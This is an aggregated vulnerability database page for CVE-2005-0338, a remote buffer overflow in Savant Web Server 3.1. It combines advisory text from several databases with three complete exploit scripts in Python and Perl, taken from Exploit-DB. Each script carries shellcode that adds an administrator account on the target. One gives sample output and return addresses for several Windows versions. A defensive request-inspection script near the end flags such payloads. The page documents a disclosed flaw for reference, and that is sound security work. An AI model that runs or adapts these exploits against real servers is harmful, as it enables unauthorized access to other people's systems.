CVE-2005-0338
CVSS 7.5
Published: 2005-05-02 00:00:00
Modified: 2016-10-17 23:10:45

[Original] Buffer overflow in Savant Web Server 3.1 allows remote attackers to execute arbitrary code via a long HTTP request.


[CNNVD] Savant Web Server Buffer Overflow Vulnerability (CNNVD-200505-417)

Savant Web Server 3.1 contains a buffer overflow vulnerability; a remote attacker can execute arbitrary code via a long HTTP request.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0338
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0338
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-417
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110756234611259&w=2
(UNKNOWN)  BUGTRAQ  20050204 Exploit For Savant Web Server 3.1 (tested on win2003)
http://marc.info/?l=full-disclosure&m=110725682327452&w=2
(UNKNOWN)  FULLDISC  20050201 Remotely exploitable buffer overflow vulnerability in Savant Web Server 3.1
http://marc.info/?l=full-disclosure&m=110728448025559&w=2
(UNKNOWN)  FULLDISC  20050201 Remotely exploitable buffer overflow vulnerability in Savant Web Server 3.1
http://www.securityfocus.com/bid/12429
(UNKNOWN)  BID  12429
http://xforce.iss.net/xforce/xfdb/19177
(UNKNOWN)  XF  savant-bo(19177)

- Vulnerability information

Savant Web Server Buffer Overflow Vulnerability
High risk  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
Savant Web Server 3.1 contains a buffer overflow vulnerability; a remote attacker can execute arbitrary code via a long HTTP request.

- Advisories and patches

No data

- Vulnerability information (781)

Savant Web Server 3.1 Remote Buffer Overflow Exploit (EDBID:781)
windows remote
2005-02-01 Verified
80 Tal Zeltzer
#########################################################
#                                                       #
# Savant web server Buffer Overflow Exploit             #
# Discovered by : Mati Aharoni                          #
# Coded by : Tal Zeltzer and Mati Aharoni               #
# www.see-security.com                                  #
# FOR RESEARCH PURPOSES ONLY!                           #
#########################################################
import struct
import socket
sc = "\x90" * 21
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\xa0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\xd8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\xb6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\xbf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\xac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4
#Change Return address as needed
buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()

# milw0rm.com [2005-02-01]

- Vulnerability information (787)

Savant Web Server 3.1 Remote Buffer OverflowExploit (win2003) (EDBID:787)
windows remote
2005-02-04 Verified
80 CorryL
#!/usr/bin/perl
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>savant.pl
#-h 127.0.0.1
#
#-=[     Savant Web Server 3.1 Remote Buffer Overflow Exploit            ]=-
#-=[                                                                     ]=-
#-=[ Coded by CorryL                            info:www.x0n3-h4ck.org   ]=-
#
#[+] Connect to 127.0.0.1
#[+] Using 00b7ead8 // Ret For Win2003
#[+] Sending Payload 258 byte
#[+] Creating Administrator User: User 'bug' Password 'hack'
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users
#
#Account utente per \\SERVER
# Added above info from http://x0n3-h4ck.org /str0ke                             #
##################################################################################
#Savant Web Server 3.1 Remote Buffer Overflow Exploit                            #        
#                                                                                #
#This exploit sends 253 evil bytes;                                              #
#the EIP register is overwritten at bytes 254 > 258.                             #
#On success the exploit creates an Administrator user                            #
#on the victim server.                                                           #
#Tested on win2003 server using ret 00b7ead8                                     #
#                                                                                #
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users #
#Account utente per \\SERVER                                                     #
#------------------------------------------------------------------------------- #
#__vmware_user__          Administrator            ASPNET                        #
#bug                      Guest                    SUPPORT_388945a0              #
#Esecuzione comando riuscita.                                                    #
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>          #
#                                                                                #
#thanks to Mati Aharoni for discovering the bug                                  #
#                                                         info: www.x0n3-h4ck.org#
##################################################################################

use IO::Socket; 
use Getopt::Std; getopts('h:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[     Savant Web Server 3.1 Remote Buffer Overflow Exploit            ]=-\n";
print STDERR "-=[                                                                     ]=-\n";
print STDERR "-=[ Coded by CorryL                            info:www.x0n3-h4ck.org   ]=-\n\n";

if (!defined($host)) {
Usage();
}

$nop = "\x90"x13;
$ret= "\xd8\xea\xb7\x00";
my $shellcode =
"\x2b\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09".
"\xb1\xc5\xbd\x83\xeb\xfc\xe2\xf4\xf5\x59\x83\xbd\x09\xb1\x4e\xf8".
"\x35\x3a\xb9\xb8\x71\xb0\x2a\x36\x46\xa9\x4e\xe2\x29\xb0\x2e\x5e".
"\x27\xf8\x4e\x89\x82\xb0\x2b\x8c\xc9\x28\x69\x39\xc9\xc5\xc2\x7c".
"\xc3\xbc\xc4\x7f\xe2\x45\xfe\xe9\x2d\xb5\xb0\x5e\x82\xee\xe1\xbc".
"\xe2\xd7\x4e\xb1\x42\x3a\x9a\xa1\x08\x5a\x4e\xa1\x82\xb0\x2e\x34".
"\x55\x95\xc1\x7e\x38\x71\xa1\x36\x49\x81\x40\x7d\x71\xbe\x4e\xfd".
"\x05\x3a\xb5\xa1\xa4\x3a\xad\xb5\xe0\xba\xc5\xbd\x09\x3a\x85\x89".
"\x0c\xcd\xc5\xbd\x09\x3a\xad\x81\x56\x80\x33\xdd\x5f\x5a\xc8\xd5".
"\xf9\x3b\xc1\xe2\x61\x29\x3b\x37\x07\xe6\x3a\x5a\xe1\x5f\x3a\x42".
"\xf6\xd2\xa8\xd9\x27\xd4\xbd\xd8\x29\x9e\xa6\x9d\x67\xd4\xb1\x9d".
"\x7c\xc2\xa0\xcf\x29\xd3\xb0\xda\x29\xd9\xa4\xde\x62\x91\xea\xfc".
"\x4d\xf5\xe5\x9b\x2f\x91\xab\xd8\x7d\x91\xa9\xd2\x6a\xd0\xa9\xda".
"\x7b\xde\xb0\xcd\x29\xf0\xa1\xd0\x60\xdf\xac\xce\x7d\xc3\xa4\xc9".
"\x66\xc3\xb6\x9d\x6b\xc4\xa2\x9d\x26\xf0\x81\xf9\x09\xb1\xc5\xbd";

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
die unless $socket;
print "[+] Using 00b7ead8 // Ret For Win2003\n";
$buff = $nop.$shellcode.$ret;
print "[+] Sending Payload 258 byte\n";
$data = "GET /$buff \r\n\r\n";

send ($socket,$data,0);
print "[+] Creating Administrator User: User 'bug' Password 'hack'\n";
# close the socket explicitly (a bare `close;` would act on the selected filehandle, not the socket)
close($socket);

sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}

# milw0rm.com [2005-02-04]

- Vulnerability information (819)

Savant Web Server 3.1 Remote BoF (French Win OS support) (EDBID:819)
windows remote
2005-02-15 Verified
80 Jerome Athias
#########################################################
#                                                       #
# Savant web server Buffer Overflow Exploit             #
# Discovered by : Mati Aharoni                          #
# Coded by : Tal Zeltzer and Mati Aharoni               #
# www.see-security.com                                  #
# FOR RESEARCH PURPOSES ONLY!                           #
# French Win OS support by Jerome Athias                #
#########################################################
import struct
import socket
sc = "\x90" * 21	#We need this number of nops
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\xa0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\xd8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\xb6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\xbf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\xac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4 (US...)
#Change Return address as needed
#buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"

#0x74FA2AC4		pop esi - pop - ret	ws2help.dll	Win 2K SP4 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x74fa2ac5) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops

#Win XP SP2 FR?
#0x719E260D		pop esi - pop - ret	ws2help.dll	Win XP SP2 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x719e260e) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()

# milw0rm.com [2005-02-15]

- Vulnerability information

13532
Savant Web Server HTTP Version Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-02-01 Unknown
2005-02-04 Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Savant Web Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 12429
Yes No
2005-02-02 12:00:00 2009-12-17 06:53:00
Mati Aharoni is credited with the discovery of this issue.

- Affected software versions

Savant Savant Webserver 3.1

- Vulnerability discussion

A remote buffer-overflow vulnerability affects Savant Web Server. This issue occurs because the application fails to validate the length of user-supplied strings before copying them into finite process buffers.

A remote attacker may leverage this issue to execute arbitrary code with the privileges of the affected webserver. This issue may facilitate unauthorized access or privilege escalation.
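As an added, defensive example that is not from this page or from Savant itself: a small Python inspector that flags request lines of the shape described here (over-long, binary request target, no HTTP version token), suitable for running over captured requests in front of a legacy server. The threshold MAX_REQUEST_LINE and both sample requests are constructed for the example; the 0xCC filler stands in for shellcode.

```python
# Added example (defensive), not from this page or from Savant: flags HTTP
# request lines shaped like the input used against CVE-2005-0338, i.e. a long
# request whose target is raw binary rather than a path.
# MAX_REQUEST_LINE is an assumed threshold; the published PoCs send ~258 bytes.
MAX_REQUEST_LINE = 200
NOP_SLED = b"\x90" * 8          # eight consecutive x86 NOPs is treated as a sled


def parse_request_line(raw: bytes):
    """Split the first line of a raw HTTP request into (method, target, version).

    version is None when the line carries no 'HTTP/x.y' token, which is what
    the Savant PoCs send ("GET /<payload> \\r\\n\\r\\n").
    """
    line = raw.partition(b"\r\n")[0]
    parts = line.split(b" ")
    method = parts[0]
    target = parts[1] if len(parts) > 1 else b""
    version = None
    if len(parts) > 2 and parts[2].startswith(b"HTTP/"):
        version = parts[2]
    return method, target, version


def inspect_request(raw: bytes) -> list:
    """Return human-readable findings; an empty list means the line looks normal."""
    findings = []
    line = raw.partition(b"\r\n")[0]
    _method, target, version = parse_request_line(raw)
    if len(line) > MAX_REQUEST_LINE:
        findings.append(f"request line is {len(line)} bytes (limit {MAX_REQUEST_LINE})")
    if version is None:
        findings.append("no HTTP version token on request line")
    binary = sum(1 for b in target if b < 0x20 or b > 0x7E)
    if binary:
        findings.append(f"{binary} non-printable bytes in request target")
    if NOP_SLED in target:
        findings.append("x86 NOP sled (run of 0x90) in request target")
    return findings


# Constructed samples: a normal request, and one shaped like the 258-byte
# payload described above (13 NOPs, 241 bytes of 0xCC filler standing in for
# shellcode, then the 4-byte return value quoted in the EDB 787 listing),
# followed by " \r\n\r\n" as the PoCs send it.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n"
SUSPICIOUS = b"GET /" + b"\x90" * 13 + b"\xcc" * 241 + b"\xd8\xea\xb7\x00" + b" \r\n\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_request(sample) or ["ok"])
```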

- Exploits

The following exploits are available:

- Solution

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
